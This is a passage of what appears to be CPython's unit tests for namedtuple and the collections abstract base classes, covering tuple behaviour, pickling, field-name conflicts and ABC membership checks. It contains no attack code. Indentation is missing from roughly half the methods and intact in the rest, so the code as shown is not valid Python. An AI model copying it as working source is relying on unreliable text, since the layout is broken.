p = Point(x=11, y=22)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
def test_tupleness(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
self.assertIsInstance(p, tuple)
self.assertEqual(p, (11, 22)) # matches a real tuple
self.assertEqual(tuple(p), (11, 22)) # coercible to a real tuple
self.assertEqual(list(p), [11, 22]) # coercible to a list
self.assertEqual(max(p), 22) # iterable
self.assertEqual(max(*p), 22) # star-able
x, y = p
self.assertEqual(p, (x, y)) # unpacks like a tuple
self.assertEqual((p[0], p[1]), (11, 22)) # indexable like a tuple
with self.assertRaises(IndexError):
p[3]
self.assertEqual(p[-1], 22)
self.assertEqual(hash(p), hash((11, 22)))
self.assertEqual(p.x, x)
self.assertEqual(p.y, y)
with self.assertRaises(AttributeError):
p.z
def test_odd_sizes(self):
Zero = namedtuple('Zero', '')
self.assertEqual(Zero(), ())
self.assertEqual(Zero._make([]), ())
self.assertEqual(repr(Zero()), 'Zero()')
self.assertEqual(Zero()._asdict(), {})
self.assertEqual(Zero()._fields, ())
Dot = namedtuple('Dot', 'd')
self.assertEqual(Dot(1), (1,))
self.assertEqual(Dot._make([1]), (1,))
self.assertEqual(Dot(1).d, 1)
self.assertEqual(repr(Dot(1)), 'Dot(d=1)')
self.assertEqual(Dot(1)._asdict(), {'d':1})
self.assertEqual(Dot(1)._replace(d=999), (999,))
self.assertEqual(Dot(1)._fields, ('d',))
n = 5000
names = list(set(''.join([choice(string.ascii_letters)
for j in range(10)]) for i in range(n)))
n = len(names)
Big = namedtuple('Big', names)
b = Big(*range(n))
self.assertEqual(b, tuple(range(n)))
self.assertEqual(Big._make(range(n)), tuple(range(n)))
for pos, name in enumerate(names):
self.assertEqual(getattr(b, name), pos)
repr(b) # make sure repr() doesn't blow-up
d = b._asdict()
d_expected = dict(zip(names, range(n)))
self.assertEqual(d, d_expected)
b2 = b._replace(**dict([(names[1], 999),(names[-5], 42)]))
b2_expected = list(range(n))
b2_expected[1] = 999
b2_expected[-5] = 42
self.assertEqual(b2, tuple(b2_expected))
self.assertEqual(b._fields, tuple(names))
def test_pickle(self):
p = TestNT(x=10, y=20, z=30)
for module in (pickle,):
loads = getattr(module, 'loads')
dumps = getattr(module, 'dumps')
for protocol in range(-1, module.HIGHEST_PROTOCOL + 1):
q = loads(dumps(p, protocol))
self.assertEqual(p, q)
self.assertEqual(p._fields, q._fields)
self.assertNotIn(b'OrderedDict', dumps(p, protocol))
def test_copy(self):
p = TestNT(x=10, y=20, z=30)
for copier in copy.copy, copy.deepcopy:
q = copier(p)
self.assertEqual(p, q)
self.assertEqual(p._fields, q._fields)
def test_name_conflicts(self):
# Some names like "self", "cls", "tuple", "itemgetter", and "property"
# failed when used as field names. Test to make sure these now work.
T = namedtuple('T', 'itemgetter property self cls tuple')
t = T(1, 2, 3, 4, 5)
self.assertEqual(t, (1,2,3,4,5))
newt = t._replace(itemgetter=10, property=20, self=30, cls=40, tuple=50)
self.assertEqual(newt, (10,20,30,40,50))
# Broader test of all interesting names taken from the code, old
# template, and an example
words = {'Alias', 'At', 'AttributeError', 'Build', 'Bypass', 'Create',
'Encountered', 'Expected', 'Field', 'For', 'Got', 'Helper',
'IronPython', 'Jython', 'KeyError', 'Make', 'Modify', 'Note',
'OrderedDict', 'Point', 'Return', 'Returns', 'Type', 'TypeError',
'Used', 'Validate', 'ValueError', 'Variables', 'a', 'accessible', 'add',
'added', 'all', 'also', 'an', 'arg_list', 'args', 'arguments',
'automatically', 'be', 'build', 'builtins', 'but', 'by', 'cannot',
'class_namespace', 'classmethod', 'cls', 'collections', 'convert',
'copy', 'created', 'creation', 'd', 'debugging', 'defined', 'dict',
'dictionary', 'doc', 'docstring', 'docstrings', 'duplicate', 'effect',
'either', 'enumerate', 'environments', 'error', 'example', 'exec', 'f',
'f_globals', 'field', 'field_names', 'fields', 'formatted', 'frame',
'function', 'functions', 'generate', 'get', 'getter', 'got', 'greater',
'has', 'help', 'identifiers', 'index', 'indexable', 'instance',
'instantiate', 'interning', 'introspection', 'isidentifier',
'isinstance', 'itemgetter', 'iterable', 'join', 'keyword', 'keywords',
'kwds', 'len', 'like', 'list', 'map', 'maps', 'message', 'metadata',
'method', 'methods', 'module', 'module_name', 'must', 'name', 'named',
'namedtuple', 'namedtuple_', 'names', 'namespace', 'needs', 'new',
'nicely', 'num_fields', 'number', 'object', 'of', 'operator', 'option',
'p', 'particular', 'pickle', 'pickling', 'plain', 'pop', 'positional',
'property', 'r', 'regular', 'rename', 'replace', 'replacing', 'repr',
'repr_fmt', 'representation', 'result', 'reuse_itemgetter', 's', 'seen',
'self', 'sequence', 'set', 'side', 'specified', 'split', 'start',
'startswith', 'step', 'str', 'string', 'strings', 'subclass', 'sys',
'targets', 'than', 'the', 'their', 'this', 'to', 'tuple', 'tuple_new',
'type', 'typename', 'underscore', 'unexpected', 'unpack', 'up', 'use',
'used', 'user', 'valid', 'values', 'variable', 'verbose', 'where',
'which', 'work', 'x', 'y', 'z', 'zip'}
T = namedtuple('T', words)
# test __new__
values = tuple(range(len(words)))
t = T(*values)
self.assertEqual(t, values)
t = T(**dict(zip(T._fields, values)))
self.assertEqual(t, values)
# test _make
t = T._make(values)
self.assertEqual(t, values)
# exercise __repr__
repr(t)
# test _asdict
self.assertEqual(t._asdict(), dict(zip(T._fields, values)))
# test _replace
t = T._make(values)
newvalues = tuple(v*10 for v in values)
newt = t._replace(**dict(zip(T._fields, newvalues)))
self.assertEqual(newt, newvalues)
# test _fields
self.assertEqual(T._fields, tuple(words))
# test __getnewargs__
self.assertEqual(t.__getnewargs__(), values)
def test_repr(self):
A = namedtuple('A', 'x')
self.assertEqual(repr(A(1)), 'A(x=1)')
# repr should show the name of the subclass
class B(A):
pass
self.assertEqual(repr(B(1)), 'B(x=1)')
def test_keyword_only_arguments(self):
# See issue 25628
with self.assertRaises(TypeError):
NT = namedtuple('NT', ['x', 'y'], True)
NT = namedtuple('NT', ['abc', 'def'], rename=True)
self.assertEqual(NT._fields, ('abc', '_1'))
with self.assertRaises(TypeError):
NT = namedtuple('NT', ['abc', 'def'], False, True)
def test_namedtuple_subclass_issue_24931(self):
class Point(namedtuple('_Point', ['x', 'y'])):
pass
a = Point(3, 4)
self.assertEqual(a._asdict(), OrderedDict([('x', 3), ('y', 4)]))
a.w = 5
self.assertEqual(a.__dict__, {'w': 5})
    @support.cpython_only
    def test_field_descriptor(self):
        """Field accessors are read-only data descriptors and survive pickling."""
        Point = namedtuple('Point', 'x y')
        p = Point(11, 22)
        self.assertTrue(inspect.isdatadescriptor(Point.x))
        self.assertEqual(Point.x.__get__(p), 11)
        # Fields are read-only: set/delete through the descriptor must fail.
        self.assertRaises(AttributeError, Point.x.__set__, p, 33)
        self.assertRaises(AttributeError, Point.x.__delete__, p)
        # The descriptors round-trip through every pickle protocol and keep
        # working when attached to an unrelated tuple subclass.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            with self.subTest(proto=proto):
                class NewPoint(tuple):
                    x = pickle.loads(pickle.dumps(Point.x, proto))
                    y = pickle.loads(pickle.dumps(Point.y, proto))
                np = NewPoint([1, 2])
                self.assertEqual(np.x, 1)
                self.assertEqual(np.y, 2)
def test_new_builtins_issue_43102(self):
obj = namedtuple('C', ())
new_func = obj.__new__
self.assertEqual(new_func.__globals__['__builtins__'], {})
self.assertEqual(new_func.__builtins__, {})
def test_match_args(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__match_args__, ('x', 'y'))
def test_non_generic_subscript(self):
# For backward compatibility, subscription works
# on arbitrary named tuple types.
Group = collections.namedtuple('Group', 'key group')
A = Group[int, list[int]]
self.assertEqual(A.__origin__, Group)
self.assertEqual(A.__parameters__, ())
self.assertEqual(A.__args__, (int, list[int]))
a = A(1, [2])
self.assertIs(type(a), Group)
self.assertEqual(a, (1, [2]))
################################################################################
### Abstract Base Classes
################################################################################
class ABCTestCase(unittest.TestCase):
    """Shared helpers for validating ABC instantiation, membership and operators."""
    def validate_abstract_methods(self, abc, *names):
        """Check that *abc* is instantiable only when all *names* are defined."""
        methodstubs = dict.fromkeys(names, lambda s, *args: 0)
        # everything should work when all required methods are present
        C = type('C', (abc,), methodstubs)
        C()
        # instantiation should fail if a required method is missing
        for name in names:
            stubs = methodstubs.copy()
            del stubs[name]
            C = type('C', (abc,), stubs)
            self.assertRaises(TypeError, C, name)
    def validate_isinstance(self, abc, name):
        """Check that defining *name* alone decides structural membership in *abc*."""
        stub = lambda s, *args: 0
        C = type('C', (object,), {'__hash__': None})
        setattr(C, name, stub)
        self.assertIsInstance(C(), abc)
        self.assertTrue(issubclass(C, abc))
        # The same shell class without the method must not match.
        C = type('C', (object,), {'__hash__': None})
        self.assertNotIsInstance(C(), abc)
        self.assertFalse(issubclass(C, abc))
    def validate_comparison(self, instance):
        """Check that binary operators on *instance* fall back to the right operand."""
        ops = ['lt', 'gt', 'le', 'ge', 'ne', 'or', 'and', 'xor', 'sub']
        operators = {}
        for op in ops:
            name = '__' + op + '__'
            operators[name] = getattr(operator, name)
        class Other:
            # Flags right_side when any of its (reflected) methods is invoked.
            def __init__(self):
                self.right_side = False
            def __eq__(self, other):
                self.right_side = True
                return True
            __lt__ = __eq__
            __gt__ = __eq__
            __le__ = __eq__
            __ge__ = __eq__
            __ne__ = __eq__
            __ror__ = __eq__
            __rand__ = __eq__
            __rxor__ = __eq__
            __rsub__ = __eq__
        for name, op in operators.items():
            if not hasattr(instance, name):
                continue
            other = Other()
            op(instance, other)
            self.assertTrue(other.right_side,'Right side not called for %s.%s'
                            % (type(instance), name))
def _test_gen():
    # Shared generator factory for the ABC tests below; its generator objects
    # serve as iterables/iterators that are not Sized, Reversible or Collection.
    yield
class TestOneTrickPonyABCs(ABCTestCase):
    def test_Awaitable(self):
        """Awaitable membership is decided by __await__ (or by registration)."""
        def gen():
            yield
        @types.coroutine
        def coro():
            yield
        async def new_coro():
            pass
        class Bar:
            def __await__(self):
                yield
        class MinimalCoro(Coroutine):
            # Smallest concrete Coroutine; close() comes from the mixin.
            def send(self, value):
                return value
            def throw(self, typ, val=None, tb=None):
                super().throw(typ, val, tb)
            def __await__(self):
                yield
        non_samples = [None, int(), gen(), object()]
        for x in non_samples:
            self.assertNotIsInstance(x, Awaitable)
            self.assertFalse(issubclass(type(x), Awaitable), repr(type(x)))
        samples = [Bar(), MinimalCoro()]
        for x in samples:
            self.assertIsInstance(x, Awaitable)
            self.assertTrue(issubclass(type(x), Awaitable))
        c = coro()
        # Iterable coroutines (generators with CO_ITERABLE_COROUTINE
        # flag don't have '__await__' method, hence can't be instances
        # of Awaitable. Use inspect.isawaitable to detect them.
        self.assertNotIsInstance(c, Awaitable)
        c = new_coro()
        self.assertIsInstance(c, Awaitable)
        c.close() # avoid RuntimeWarning that coro() was not awaited
        class CoroLike: pass
        Coroutine.register(CoroLike)
        self.assertTrue(isinstance(CoroLike(), Awaitable))
        self.assertTrue(issubclass(CoroLike, Awaitable))
        CoroLike = None
        support.gc_collect() # Kill CoroLike to clean-up ABCMeta cache
def test_Coroutine(self):
def gen():
yield
@types.coroutine
def coro():
yield
async def new_coro():
pass
class Bar:
def __await__(self):
yield
class MinimalCoro(Coroutine):
def send(self, value):
return value
def throw(self, typ, val=None, tb=None):
super().throw(typ, val, tb)
def __await__(self):
yield
non_samples = [None, int(), gen(), object(), Bar()]
for x in non_samples:
self.assertNotIsInstance(x, Coroutine)
self.assertFalse(issubclass(type(x), Coroutine), repr(type(x)))
samples = [MinimalCoro()]
for x in samples:
self.assertIsInstance(x, Awaitable)
self.assertTrue(issubclass(type(x), Awaitable))
c = coro()
# Iterable coroutines (generators with CO_ITERABLE_COROUTINE
# flag don't have '__await__' method, hence can't be instances
# of Coroutine. Use inspect.isawaitable to detect them.
self.assertNotIsInstance(c, Coroutine)
c = new_coro()
self.assertIsInstance(c, Coroutine)
c.close() # avoid RuntimeWarning that coro() was not awaited
class CoroLike:
def send(self, value):
pass
def throw(self, typ, val=None, tb=None):
pass
def close(self):
pass
def __await__(self):
pass
self.assertTrue(isinstance(CoroLike(), Coroutine))
self.assertTrue(issubclass(CoroLike, Coroutine))
class CoroLike:
def send(self, value):
pass
def close(self):
pass
def __await__(self):
pass
self.assertFalse(isinstance(CoroLike(), Coroutine))
self.assertFalse(issubclass(CoroLike, Coroutine))
    def test_Hashable(self):
        """Hashable tracks __hash__: mutable builtin containers are excluded."""
        # Check some non-hashables
        non_samples = [bytearray(), list(), set(), dict()]
        for x in non_samples:
            self.assertNotIsInstance(x, Hashable)
            self.assertFalse(issubclass(type(x), Hashable), repr(type(x)))
        # Check some hashables
        samples = [None,
                   int(), float(), complex(),
                   str(),
                   tuple(), frozenset(),
                   int, list, object, type, bytes()
                   ]
        for x in samples:
            self.assertIsInstance(x, Hashable)
            self.assertTrue(issubclass(type(x), Hashable), repr(type(x)))
        # The ABC itself cannot be instantiated.
        self.assertRaises(TypeError, Hashable)
        # Check direct subclassing
        class H(Hashable):
            def __hash__(self):
                return super().__hash__()
        self.assertEqual(hash(H()), 0)
        self.assertFalse(issubclass(int, H))
        self.validate_abstract_methods(Hashable, '__hash__')
        self.validate_isinstance(Hashable, '__hash__')
def test_AsyncIterable(self):
class AI:
def __aiter__(self):
return self
self.assertTrue(isinstance(AI(), AsyncIterable))
self.assertTrue(issubclass(AI, AsyncIterable))
# Check some non-iterables
non_samples = [None, object, []]
for x in non_samples:
self.assertNotIsInstance(x, AsyncIterable)
self.assertFalse(issubclass(type(x), AsyncIterable), repr(type(x)))
self.validate_abstract_methods(AsyncIterable, '__aiter__')
self.validate_isinstance(AsyncIterable, '__aiter__')
    def test_AsyncIterator(self):
        """AsyncIterator needs both __anext__ and __aiter__."""
        class AI:
            def __aiter__(self):
                return self
            async def __anext__(self):
                raise StopAsyncIteration
        self.assertTrue(isinstance(AI(), AsyncIterator))
        self.assertTrue(issubclass(AI, AsyncIterator))
        non_samples = [None, object, []]
        # Check some non-iterables
        for x in non_samples:
            self.assertNotIsInstance(x, AsyncIterator)
            self.assertFalse(issubclass(type(x), AsyncIterator), repr(type(x)))
        # Similarly to regular iterators (see issue 10565)
        class AnextOnly:
            async def __anext__(self):
                raise StopAsyncIteration
        self.assertNotIsInstance(AnextOnly(), AsyncIterator)
        self.validate_abstract_methods(AsyncIterator, '__anext__', '__aiter__')
    def test_Iterable(self):
        """Iterable tracks __iter__, including the None-blocking convention."""
        # Check some non-iterables
        non_samples = [None, 42, 3.14, 1j]
        for x in non_samples:
            self.assertNotIsInstance(x, Iterable)
            self.assertFalse(issubclass(type(x), Iterable), repr(type(x)))
        # Check some iterables
        samples = [bytes(), str(),
                   tuple(), list(), set(), frozenset(), dict(),
                   dict().keys(), dict().items(), dict().values(),
                   _test_gen(),
                   (x for x in []),
                   ]
        for x in samples:
            self.assertIsInstance(x, Iterable)
            self.assertTrue(issubclass(type(x), Iterable), repr(type(x)))
        # Check direct subclassing
        class I(Iterable):
            def __iter__(self):
                return super().__iter__()
        self.assertEqual(list(I()), [])
        self.assertFalse(issubclass(str, I))
        self.validate_abstract_methods(Iterable, '__iter__')
        self.validate_isinstance(Iterable, '__iter__')
        # Check None blocking: setting __iter__ = None opts a subclass out.
        class It:
            def __iter__(self): return iter([])
        class ItBlocked(It):
            __iter__ = None
        self.assertTrue(issubclass(It, Iterable))
        self.assertTrue(isinstance(It(), Iterable))
        self.assertFalse(issubclass(ItBlocked, Iterable))
        self.assertFalse(isinstance(ItBlocked(), Iterable))
    def test_Reversible(self):
        """Reversible requires both __reversed__ and __iter__."""
        # Check some non-reversibles
        non_samples = [None, 42, 3.14, 1j, set(), frozenset()]
        for x in non_samples:
            self.assertNotIsInstance(x, Reversible)
            self.assertFalse(issubclass(type(x), Reversible), repr(type(x)))
        # Check some non-reversible iterables
        non_reversibles = [_test_gen(), (x for x in []), iter([]), reversed([])]
        for x in non_reversibles:
            self.assertNotIsInstance(x, Reversible)
            self.assertFalse(issubclass(type(x), Reversible), repr(type(x)))
        # Check some reversible iterables
        samples = [bytes(), str(), tuple(), list(), OrderedDict(),
                   OrderedDict().keys(), OrderedDict().items(),
                   OrderedDict().values(), Counter(), Counter().keys(),
                   Counter().items(), Counter().values(), dict(),
                   dict().keys(), dict().items(), dict().values()]
        for x in samples:
            self.assertIsInstance(x, Reversible)
            self.assertTrue(issubclass(type(x), Reversible), repr(type(x)))
        # Check also Mapping, MutableMapping, and Sequence
        self.assertTrue(issubclass(Sequence, Reversible), repr(Sequence))
        self.assertFalse(issubclass(Mapping, Reversible), repr(Mapping))
        self.assertFalse(issubclass(MutableMapping, Reversible), repr(MutableMapping))
        # Check direct subclassing
        class R(Reversible):
            def __iter__(self):
                return iter(list())
            def __reversed__(self):
                return iter(list())
        self.assertEqual(list(reversed(R())), [])
        self.assertFalse(issubclass(float, R))
        self.validate_abstract_methods(Reversible, '__reversed__', '__iter__')
        # Check reversible non-iterable (which is not Reversible)
        class RevNoIter:
            def __reversed__(self): return reversed([])
        class RevPlusIter(RevNoIter):
            def __iter__(self): return iter([])
        self.assertFalse(issubclass(RevNoIter, Reversible))
        self.assertFalse(isinstance(RevNoIter(), Reversible))
        self.assertTrue(issubclass(RevPlusIter, Reversible))
        self.assertTrue(isinstance(RevPlusIter(), Reversible))
        # Check None blocking: either method set to None opts a subclass out.
        class Rev:
            def __iter__(self): return iter([])
            def __reversed__(self): return reversed([])
        class RevItBlocked(Rev):
            __iter__ = None
        class RevRevBlocked(Rev):
            __reversed__ = None
        self.assertTrue(issubclass(Rev, Reversible))
        self.assertTrue(isinstance(Rev(), Reversible))
        self.assertFalse(issubclass(RevItBlocked, Reversible))
        self.assertFalse(isinstance(RevItBlocked(), Reversible))
        self.assertFalse(issubclass(RevRevBlocked, Reversible))
        self.assertFalse(isinstance(RevRevBlocked(), Reversible))
def test_Collection(self):
# Check some non-collections
non_collections = [None, 42, 3.14, 1j, lambda x: 2*x]
for x in non_collections:
self.assertNotIsInstance(x, Collection)
self.assertFalse(issubclass(type(x), Collection), repr(type(x)))
# Check some non-collection iterables
non_col_iterables = [_test_gen(), iter(b''), iter(bytearray()),
(x for x in [])]
for x in non_col_iterables:
self.assertNotIsInstance(x, Collection)
self.assertFalse(issubclass(type(x), Collection), repr(type(x)))
# Check some collections
samples = [set(), frozenset(), dict(), bytes(), str(), tuple(),
list(), dict().keys(), dict().items(), dict().values()]
for x in samples:
self.assertIsInstance(x, Collection)
self.assertTrue(issubclass(type(x), Collection), repr(type(x)))
# Check also Mapping, MutableMapping, etc.
self.assertTrue(issubclass(Sequence, Collection), repr(Sequence))
self.assertTrue(issubclass(Mapping, Collection), repr(Mapping))
self.assertTrue(issubclass(MutableMapping, Collection),
repr(MutableMapping))
self.assertTrue(issubclass(Set, Collection), repr(Set))
self.assertTrue(issubclass(MutableSet, Collection), repr(MutableSet))
self.assertTrue(issubclass(Sequence, Collection), repr(MutableSet))
# Check direct subclassing
class Col(Collection):
def __iter__(self):
return iter(list())
def __len__(self):
return 0
def __contains__(self, item):
return False
class DerCol(Col): pass
self.assertEqual(list(iter(Col())), [])
self.assertFalse(issubclass(list, Col))
self.assertFalse(issubclass(set, Col))
self.assertFalse(issubclass(float, Col))
self.assertEqual(list(iter(DerCol())), [])
self.assertFalse(issubclass(list, DerCol))
self.assertFalse(issubclass(set, DerCol))
self.assertFalse(issubclass(float, DerCol))
self.validate_abstract_methods(Collection, '__len__', '__iter__',
'__contains__')
# Check sized container non-iterable (which is not Collection) etc.
class ColNoIter:
def __len__(self): return 0
def __contains__(self, item): return False
class ColNoSize:
def __iter__(self): return iter([])
def __contains__(self, item): return False
class ColNoCont:
def __iter__(self): return iter([])
def __len__(self): return 0
self.assertFalse(issubclass(ColNoIter, Collection))
self.assertFalse(isinstance(ColNoIter(), Collection))
self.assertFalse(issubclass(ColNoSize, Collection))
self.assertFalse(isinstance(ColNoSize(), Collection))
self.assertFalse(issubclass(ColNoCont, Collection))
self.assertFalse(isinstance(ColNoCont(), Collection))
# Check None blocking
class SizeBlock:
def __iter__(self): return iter([])
def __contains__(self): return False
__len__ = None
class IterBlock:
def __len__(self): return 0
def __contains__(self): return True
__iter__ = None
self.assertFalse(issubclass(SizeBlock, Collection))
self.assertFalse(isinstance(SizeBlock(), Collection))
self.assertFalse(issubclass(IterBlock, Collection))
self.assertFalse(isinstance(IterBlock(), Collection))
# Check None blocking in subclass
class ColImpl:
def __iter__(self):
return iter(list())
def __len__(self):
return 0
def __contains__(self, item):
return False
class NonCol(ColImpl):
__contains__ = None
self.assertFalse(issubclass(NonCol, Collection))
self.assertFalse(isinstance(NonCol(), Collection))
    def test_Iterator(self):
        """Iterator requires __next__ together with __iter__."""
        non_samples = [None, 42, 3.14, 1j, b"", "", (), [], {}, set()]
        for x in non_samples:
            self.assertNotIsInstance(x, Iterator)
            self.assertFalse(issubclass(type(x), Iterator), repr(type(x)))
        samples = [iter(bytes()), iter(str()),
                   iter(tuple()), iter(list()), iter(dict()),
                   iter(set()), iter(frozenset()),
                   iter(dict().keys()), iter(dict().items()),
                   iter(dict().values()),
                   _test_gen(),
                   (x for x in []),
                   ]
        for x in samples:
            self.assertIsInstance(x, Iterator)
            self.assertTrue(issubclass(type(x), Iterator), repr(type(x)))
        self.validate_abstract_methods(Iterator, '__next__', '__iter__')
        # Issue 10565: __next__ alone is not enough.
        class NextOnly:
            def __next__(self):
                yield 1
            return
        self.assertNotIsInstance(NextOnly(), Iterator)
    def test_Generator(self):
        """Generator requires send/throw/close on top of the iterator protocol."""
        class NonGen1:
            def __iter__(self): return self
            def __next__(self): return None
            def close(self): pass
            def throw(self, typ, val=None, tb=None): pass
        class NonGen2:
            def __iter__(self): return self
            def __next__(self): return None
            def close(self): pass
            def send(self, value): return value
        class NonGen3:
            def close(self): pass
            def send(self, value): return value
            def throw(self, typ, val=None, tb=None): pass
        non_samples = [
            None, 42, 3.14, 1j, b"", "", (), [], {}, set(),
            iter(()), iter([]), NonGen1(), NonGen2(), NonGen3()]
        for x in non_samples:
            self.assertNotIsInstance(x, Generator)
            self.assertFalse(issubclass(type(x), Generator), repr(type(x)))
        class Gen:
            def __iter__(self): return self
            def __next__(self): return None
            def close(self): pass
            def send(self, value): return value
            def throw(self, typ, val=None, tb=None): pass
        class MinimalGen(Generator):
            def send(self, value):
                return value
            def throw(self, typ, val=None, tb=None):
                super().throw(typ, val, tb)
        def gen():
            yield 1
        samples = [gen(), (lambda: (yield))(), Gen(), MinimalGen()]
        for x in samples:
            self.assertIsInstance(x, Iterator)
            self.assertIsInstance(x, Generator)
            self.assertTrue(issubclass(type(x), Generator), repr(type(x)))
        self.validate_abstract_methods(Generator, 'send', 'throw')
        # mixin tests: __iter__/__next__/close are supplied by the ABC.
        mgen = MinimalGen()
        self.assertIs(mgen, iter(mgen))
        self.assertIs(mgen.send(None), next(mgen))
        self.assertEqual(2, mgen.send(2))
        self.assertIsNone(mgen.close())
        self.assertRaises(ValueError, mgen.throw, ValueError)
        self.assertRaisesRegex(ValueError, "^huhu$",
                               mgen.throw, ValueError, ValueError("huhu"))
        self.assertRaises(StopIteration, mgen.throw, StopIteration())
        # close() propagates errors raised by throw() ...
        class FailOnClose(Generator):
            def send(self, value): return value
            def throw(self, *args): raise ValueError
        self.assertRaises(ValueError, FailOnClose().close)
        # ... and complains when GeneratorExit is ignored.
        class IgnoreGeneratorExit(Generator):
            def send(self, value): return value
            def throw(self, *args): pass
        self.assertRaises(RuntimeError, IgnoreGeneratorExit().close)
    def test_AsyncGenerator(self):
        """AsyncGenerator mirrors Generator: asend/athrow/aclose + __anext__."""
        class NonAGen1:
            def __aiter__(self): return self
            def __anext__(self): return None
            def aclose(self): pass
            def athrow(self, typ, val=None, tb=None): pass
        class NonAGen2:
            def __aiter__(self): return self
            def __anext__(self): return None
            def aclose(self): pass
            def asend(self, value): return value
        class NonAGen3:
            def aclose(self): pass
            def asend(self, value): return value
            def athrow(self, typ, val=None, tb=None): pass
        non_samples = [
            None, 42, 3.14, 1j, b"", "", (), [], {}, set(),
            iter(()), iter([]), NonAGen1(), NonAGen2(), NonAGen3()]
        for x in non_samples:
            self.assertNotIsInstance(x, AsyncGenerator)
            self.assertFalse(issubclass(type(x), AsyncGenerator), repr(type(x)))
        class Gen:
            def __aiter__(self): return self
            async def __anext__(self): return None
            async def aclose(self): pass
            async def asend(self, value): return value
            async def athrow(self, typ, val=None, tb=None): pass
        class MinimalAGen(AsyncGenerator):
            async def asend(self, value):
                return value
            async def athrow(self, typ, val=None, tb=None):
                await super().athrow(typ, val, tb)
        async def gen():
            yield 1
        samples = [gen(), Gen(), MinimalAGen()]
        for x in samples:
            self.assertIsInstance(x, AsyncIterator)
            self.assertIsInstance(x, AsyncGenerator)
            self.assertTrue(issubclass(type(x), AsyncGenerator), repr(type(x)))
        self.validate_abstract_methods(AsyncGenerator, 'asend', 'athrow')
        def run_async(coro):
            # Drive a coroutine to completion synchronously and return its result.
            result = None
            while True:
                try:
                    coro.send(None)
                except StopIteration as ex:
                    result = ex.args[0] if ex.args else None
                    break
            return result
        # mixin tests: __aiter__/__anext__/aclose are supplied by the ABC.
        mgen = MinimalAGen()
        self.assertIs(mgen, mgen.__aiter__())
        self.assertIs(run_async(mgen.asend(None)), run_async(mgen.__anext__()))
        self.assertEqual(2, run_async(mgen.asend(2)))
        self.assertIsNone(run_async(mgen.aclose()))
        with self.assertRaises(ValueError):
            run_async(mgen.athrow(ValueError))
        # aclose() propagates errors raised by athrow() ...
        class FailOnClose(AsyncGenerator):
            async def asend(self, value): return value
            async def athrow(self, *args): raise ValueError
        with self.assertRaises(ValueError):
            run_async(FailOnClose().aclose())
        # ... and complains when GeneratorExit is ignored.
        class IgnoreGeneratorExit(AsyncGenerator):
            async def asend(self, value): return value
            async def athrow(self, *args): pass
        with self.assertRaises(RuntimeError):
            run_async(IgnoreGeneratorExit().aclose())
def test_Sized(self):
non_samples = [None, 42, 3.14, 1j,
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Sized)
self.assertFalse(issubclass(type(x), Sized), repr(type(x)))
samples = [bytes(), str(),
tuple(), list(), set(), frozenset(), dict(),
dict().keys(), dict().items(), dict().values(),
]
for x in samples:
self.assertIsInstance(x, Sized)
self.assertTrue(issubclass(type(x), Sized), repr(type(x)))
self.validate_abstract_methods(Sized, '__len__')
self.validate_isinstance(Sized, '__len__')
def test_Container(self):
non_samples = [None, 42, 3.14, 1j,
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Container)
self.assertFalse(issubclass(type(x), Container), repr(type(x)))
samples = [bytes(), str(),
tuple(), list(), set(), frozenset(), dict(),
dict().keys(), dict().items(),
]
for x in samples:
self.assertIsInstance(x, Container)
self.assertTrue(issubclass(type(x), Container), repr(type(x)))
self.validate_abstract_methods(Container, '__contains__')
self.validate_isinstance(Container, '__contains__')
def test_Callable(self):
non_samples = [None, 42, 3.14, 1j,
"", b"", (), [], {}, set(),
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Callable)
self.assertFalse(issubclass(type(x), Callable), repr(type(x)))
samples = [lambda: None,
type, int, object,
len,
list.append, [].append,
]
for x in samples:
self.assertIsInstance(x, Callable)
self.assertTrue(issubclass(type(x), Callable), repr(type(x)))
self.validate_abstract_methods(Callable, '__call__')
self.validate_isinstance(Callable, '__call__')
def test_direct_subclassing(self):
for B in Hashable, Iterable, Iterator, Reversible, Sized, Container, Callable:
class C(B):
pass
self.assertTrue(issubclass(C, B))
self.assertFalse(issubclass(int, C))
def test_registration(self):
for B in Hashable, Iterable, Iterator, Reversible, Sized, Container, Callable:
class C:
__hash__ = None # Make sure it isn't hashable by default
self.assertFalse(issubclass(C, B), B.__name__)
B.register(C)
self.assertTrue(issubclass(C, B))
class WithSet(MutableSet):
    """Minimal MutableSet backed by a real set.

    Used by the issue-5647/8750 tests below to exercise the MutableSet
    mixin's in-place operators.
    """
    def __init__(self, it=()):
        self.data = set(it)
    def __len__(self):
        return len(self.data)
    def __iter__(self):
        return iter(self.data)
    def __contains__(self, item):
        return item in self.data
    def add(self, item):
        self.data.add(item)
    def discard(self, item):
        self.data.discard(item)
class TestCollectionABCs(ABCTestCase):
    # XXX For now, we only test some virtual inheritance properties.
    # We should also test the proper behavior of the collection ABCs
    # as real base classes or mix-in classes.
    def test_Set(self):
        """set and frozenset are Sets; a minimal Set subclass compares sanely."""
        for sample in [set, frozenset]:
            self.assertIsInstance(sample(), Set)
            self.assertTrue(issubclass(sample, Set))
        self.validate_abstract_methods(Set, '__contains__', '__iter__', '__len__')
        class MySet(Set):
            def __contains__(self, x):
                return False
            def __len__(self):
                return 0
            def __iter__(self):
                return iter([])
        self.validate_comparison(MySet())
def test_hash_Set(self):
class OneTwoThreeSet(Set):
def __init__(self):
self.contents = [1, 2, 3]
def __contains__(self, x):
return x in self.contents
def __len__(self):
return len(self.contents)
def __iter__(self):
return iter(self.contents)
def __hash__(self):
return self._hash()
a, b = OneTwoThreeSet(), OneTwoThreeSet()
self.assertTrue(hash(a) == hash(b))
def test_isdisjoint_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1, 2, 3))
s2 = MySet((4, 5, 6))
s3 = MySet((1, 5, 6))
self.assertTrue(s1.isdisjoint(s2))
self.assertFalse(s1.isdisjoint(s3))
def test_equality_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1,))
s2 = MySet((1, 2))
